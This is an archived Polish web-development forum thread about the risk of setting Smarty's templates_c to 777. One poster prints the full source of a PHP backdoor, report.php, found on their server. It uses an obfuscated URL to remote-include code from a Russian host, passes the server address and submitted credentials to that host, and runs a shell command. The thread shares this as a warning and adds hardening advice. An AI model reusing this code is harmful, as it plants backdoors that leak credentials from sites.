Skocz do zawartości

Bezpieczeństwo Smarty

madel

Rekomendowane odpowiedzi

Mam następujący problem: wykorzystanie Smarty'ego ciągnie za sobą potrzebę ustawienia chmod 777 dla templates_c, w dokumentacji pisza o 775 ale to niestety po prostu nie działa dla 775 ani 776 (może kwestia konf serwera, nie wiem). W każdym razie czy możliwe jest wrzucenie zdalne pliku .php do templates_c i wykonanie go w celu kradzieży zawartości serwera?

A tak wogólę to proponuję osobny dział pod tytułem bezpieczeństwo na tym forum.

Dzięki z góry za sensowne dopiski do tematu.

Prawdziwy inżynier to taki, który unika drobnych błędów na drodze do wielkiej katastrofy.

W każdym razie czy możliwe jest wrzucenie zdalne pliku .php do templates_c i wykonanie go w celu kradzieży zawartości serwera?
NIE

HTTP 200 usługi IT -> Dariusz Janicki | Realizacja serwisów www oraz oprogramowania w PHP / C# / Golang / Node.js / MySQL/ Laravel
Komory normobaryczne - normobaria.tech Wykonawca montażu i instalacji komory normobarii

Poruszylem ten temat ponieważ znalazłem u siebie podejrzany plik report.php w folderze 777, plik ma nastepująca strukturę i jak sie okazało po przeszukaniu netu jest to dość popularny robak, dociąga biblioteki z adresu bis.iframe.ru/master.php?r_addr= :

<?php

error_reporting(0);

if(isset($_POST["l"]) and isset($_POST["p"])){

if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}

else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}

}else{$user_auth="";}

if(!isset($_POST["log_flg"])){$log_flg="&log";}

if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))

{

if($_POST["l"]=="special"){print "sys_active". `uname -a`;}

}

?>

Więcej na ten temat:

https://www.google.pl/search?hs=f4c&hl=...=Szukaj&lr=

Plik jest samokopiujący i atakuje cały serwer (wszedł nie przez mojego CMS'a jak poczatkowo sądziłem - sprawdzam mime więc nie da rady) ale kędy innędy i ponoć kopiuje sie do wszystkich 777 na serwerze i usuwanie nic nie daje, oczywiście zgłosiłem adminowi serwera, ale konkluzja na jednym z forów dyskusyjnych po burzliwej dyskusji brzmi:

This is a server expoit you are not safe until you ahve moved to anew server.

Innymi słowy - zmień host.

Deny all ponoć blokuje move_uploaded_files więc nie wszędzie da się stosować.

Ponoć plik głównie miesza z płatnościami kartą których na szczęście u siebie nie mam zaimplementowanych.

W kazdym razie uczulam na problem, jeżeli macie 777 sprawdzcie czy nie ma tam pliku report.php

Prawdziwy inżynier to taki, który unika drobnych błędów na drodze do wielkiej katastrofy.

The Smarty directories are only accessed by the Smarty library and never accessed directly by the web browser. Therefore to avoid any security concerns, it is recommended to place these directories outside of the document root.

Wystarczy stosować się do manuala.

Dała matka rozum? To kombinuj.

No przecież tłumaczę, że to jest robak, który łazi po całym serwerze i wszedł nie przez mój serwis tylko przez jakiegoś dziurawego cms'a i teraz sie kopiuje po wszystkich folderach 777 w obrębie całego serwera więc lokalizacja katalogu nic nie zmienia.

W takim razie, dlaczego jako koder zajmujesz się serwerem? Folder tymczasowy tmp powinien być postawiony jako osobna partycja z atrybutem noexec i nosuid. Ogólnie, jak to zabezpieczyć masz napisane https://www.webhostgear.com/34.html . Inaczej żadne sztuczki php Ci nie pomogą.

Dała matka rozum? To kombinuj.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Ostatnio przeglądający   0 użytkowników

• Brak zarejestrowanych użytkowników przeglądających tę stronę.
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności